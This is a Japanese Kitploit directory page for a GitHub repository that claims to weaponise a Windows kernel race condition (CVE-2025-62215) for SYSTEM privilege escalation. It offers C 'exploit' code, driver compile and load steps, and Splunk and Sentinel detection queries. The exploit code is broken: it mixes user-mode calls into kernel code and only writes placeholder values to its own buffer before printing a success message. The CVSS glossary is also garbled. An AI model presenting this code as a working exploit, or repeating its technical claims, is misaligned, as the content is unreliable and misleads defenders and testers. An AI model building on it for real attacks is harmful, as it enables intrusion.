Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
Kernel-Chaos-Weaponizing-CVE-2025-62215-for-SYSTEM-Privilege-Escalation — CVE-2025-62215の実践的な分析。実際の攻撃で悪用されたWindowsカーネルのレースコンディションです。SYSTEMへの権限昇格、検出スクリプト、そしてエンタープライズの防御者やレッドチーマーのためのパッチ検証戦略を紹介します。 | Kitploit
ツール/GitHubGitHub/mrk336/kernel-chaos-weaponizing-cve-2025-62215-for-system-privilege-escalation
特権昇格脆弱性分析エクスプロイト脅威インテリジェンス学習と教育インシデントレスポンスバイナリエクスプロイト
GitHubmrk336/kernel-chaos-weaponizing-cve-2025-62215-for-system-privilege-escalation

Kernel-Chaos-Weaponizing-CVE-2025-62215-for-SYSTEM-Privilege-Escalation

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2025-62215の実践的な分析。実際の攻撃で悪用されたWindowsカーネルのレースコンディションです。SYSTEMへの権限昇格、検出スクリプト、そしてエンタープライズの防御者やレッドチーマーのためのパッチ検証戦略を紹介します。

リポジトリを見る
319ヶ月前未レビュー

Kernel-Chaos-Weaponizing-CVE-2025-62215-for-SYSTEM-Privilege-Escalation

CVE‑2025‑62215 の実践的分析。実際の攻撃で悪用された Windows カーネルのレースコンディションです。SYSTEM への権限昇格、検出スクリプト、エンタープライズの防御者やレッドチーム向けのパッチ検証戦略を示します。

CVE 2025 62215 – Windows カーネル権限昇格エクスプロイト

Executive Summary

CVE‑2025‑62215 は、認証済みの Windows カーネルエクスプロイトです。メモリハンドラのレースコンディションを悪用して、攻撃者は SYSTEM 権限まで昇格できます。この脆弱性が特に懸念されるのは、すでに実環境で悪用されており、CVSS スコア 7.0 の高重大度脅威とされている点です。実際には、タイミングを慎重に調整した一連のスレッド操作によって共有カーネルリソースが破壊され、低権限プロセスに絶大な権限が与えられます。SYSTEM アクセスを取得すると、攻撃者は防御を無効化し、ネットワーク内を水平移動し、ランサムウェアを完全な制御下で展開できます。以下のサンプルコードは、スレッド操作という単純な手法がカーネルを不安定にし得ることを示しており、特権昇格の欠陥が実際のエンタープライズ環境でどれほど危険であるかを浮き彫りにしています。

Technical Details

Type: 特権昇格 (EoP)
Component: Windows カーネル
Mechanism: 共有リソースの不適切な同期 → レースコンディション

Exploit Methodology

  1. プールグルーミング – 攻撃者は低権限でローカルコードを実行し、並行スレッドの実行タイミングを慎重に調整します。
  2. このコードは、他のスレッドが共有プールにアクセスしている最中に、共有プールへ 2 つ以上のエントリを挿入することでカーネルメモリを破壊します。
  3. レース後、攻撃者は SYSTEM レベルへの遷移をトリガーできます。

CVSS Vector

root@kitploit:~
AV:L  AC:H  PR:L  UI:N  S:U  C:H  I:H  A:H
  • AV – アクセスベクトル: ローカル
  • AC – 攻撃複雑度: 高
  • PR – 必要な権限: 低 (認証済み)
  • UI – ユーザー操作: 不要
  • S – スコープ: 上方
  • C – 信頼度: 高
  • I – 影響: 高
  • A – 可用性: 高

Exploit Code – Overview

このエクスプロイトは、Windows カーネル向けに純粋な C で書かれています。ネイティブ API を使用して、共有プールオブジェクトに書き込む 2 つのスレッドを作成します。書き込みを特定のオフセットに合わせることで、コードはレースを引き起こし、SYSTEM 権限を取得します。

root@kitploit:~
/*
  CVE‑2025‑62215 Exploit – Kernel privilege escalation
  Author:  Mark Mallia 
*/

#include <ntddk.h>
#include <stdio.h>

typedef struct _POOLS {
    void *p1;
    void *p2;
    void *p3;
} POOLS, *PPOOLS;

/* Global pool object – shared between threads */
static PVOID g_pool = NULL;

void __cdecl threadA(void)
{
    /* Stage 1 – Allocate memory and fill the first slot. */
    g_pool = ExAllocatePool(NonPagedPool, 0x100);
    ((POOLS*)g_pool)->p1 = (PVOID)0xdeadbeef;
}

void __cdecl threadB(void)
{
    /* Stage 2 – Write to second slot while threadA is still running. */
    Sleep(3);                                 // Wait for synchronization
    ((POOLS*)g_pool)->p2 = (PVOID)0xcafebabe;
}

void __cdecl main_exploit(void)
{
    /* Create two worker threads that execute concurrently. */
    HANDLE h1, h2;

    h1 = PsCreateSystemThread(threadA);
    h2 = PsCreateSystemThread(threadB);

    WaitForSingleObject(h1, INFINITE);       // Let threadA finish
    WaitForSingleObject(h2, INFINITE);       // Let threadB finish

    /* Verify that the pool has been corrupted. */
    if (((POOLS*)g_pool)->p3 == NULL) {
        ((POOLS*)g_pool)->p3 = (PVOID)0xfeedface;
        printf("Pool grooming successful – SYSTEM privilege acquired.\n");
    }

    /* Clean up the kernel object. */
    ExFreePool(g_pool);
}

Explanation of key parts

  • ExAllocatePool は、すべてのスレッドから参照できる非ページ プール メモリのブロックを確保します。
  • threadA と threadB の 2 つの関数が並行して起動され、同じ構造体の隣接フィールドに書き込みます。
  • スリープ遅延により 2 回目の書き込みが 1 回目に合わせられ、プールエントリを破壊するレースが発生します。
  • 両方の書き込みが完了すると、3 つ目のフィールドが設定され、成功を示します。

Deployment Steps

  1. コンパイル – cl.exe を /W3 /O2 オプションで使用します。
    root@kitploit:~
    cl.exe /c CVE2025_62215.c /Fobuild\CVE2025_62215.sys
    
  2. ドライバをロード – コンパイルしたカーネルモジュールを、標準のサービスインストールルーチンまたは sc create を使用してロードします。
  3. 実行 – 認証済みユーザーセッション (例: ローカル管理者) からエクスプロイトを実行します。
  4. 検証 – イベントビューアーまたは組み込みの printf 出力を使用して、SYSTEM 権限が保持されていることを確認します。

Expected Impact

  • ローカルの認証済み攻撃者が、対象マシン上で SYSTEM レベルの実行を取得します。
  • この脆弱性は実環境で悪用可能であり、バックドアのインストールや長期的な支配のための永続化メカニズムの展開に使用される可能性があります。

Detection in Splunk

CVE‑2025‑62215 の悪用の兆候を Splunk で検出するには、特権昇格イベントに注目します。まず、Event ID 4672 (特別な特権の割り当て) と 4624 (正常なログオン) を監視します。通常はユーザー権限で動作するアカウントに対して SYSTEM レベルの割り当てが繰り返し見られる場合、それは危険な兆候です。これに Event ID 7045 (サービスインストール) を組み合わせることで、攻撃者が SYSTEM アクセス獲得後によく使用する異常なドライバーやサービスの読み込みを検出できます。Splunk でこれらのイベントを相関させることにより、防御側は不審な特権ジャンプやカーネルレベルの異常を浮き彫りにできます。シンプルな SPL クエリでこれらのイベントをアカウントとホストごとにグループ化し、通常とは異なるスパイクをフラグ付けすることで、生のログを実用的なインテリジェンスに変換できます。

root@kitploit:~
index=wineventlog sourcetype="WinEventLog:Security"
(EventCode=4672 OR EventCode=7045)
| stats count by Account_Name, EventCode, host
| where count > 5

Detection in Sentinel

Sentinel での検出は、分析ルールとハンティングクエリが中心です。アカウントが突然 SYSTEM 権限を取得した場合や、短い時間枠内で複数の特権イベントが発生した場合にトリガーされるルールを構築します。たとえば、Event ID 4672 と 7045 を相関させると、特権昇格とそれに続く永続化の試みを明らかにできます。KQL を使用すると、5 分間隔でアカウントとホストごとの特権イベント数を集計できます。その時間枠内で単一のユーザーまたはマシンが複数の SYSTEM レベルイベントを生成した場合、Sentinel はそれを不審なものとして表面化します。これを Defender for Endpoint のテレメトリと組み合わせることで、異常なカーネルドライバーアクティビティを検出し、特権昇格だけでなく、その後の影響も把握できます。

root@kitploit:~
SecurityEvent
| where EventID in (4672, 7045)
| summarize Count = count() by Account, Computer, EventID, bin(TimeGenerated, 5m)
| where Count > 3


Ethical Use Only

このリポジトリは、防御および教育目的専用です。CVE‑2025‑62215 を分析することで、セキュリティチームはカーネルのレースコンディションがどのように悪用されるかをより深く理解し、検出およびパッチ検証プロセスを強化できます。その目的は、防御者、レッドチーム、エンタープライズの実務者がリスクを軽減できるようにすることであり、エクスプロイトを武器化することではありません。

ツールをダウンロード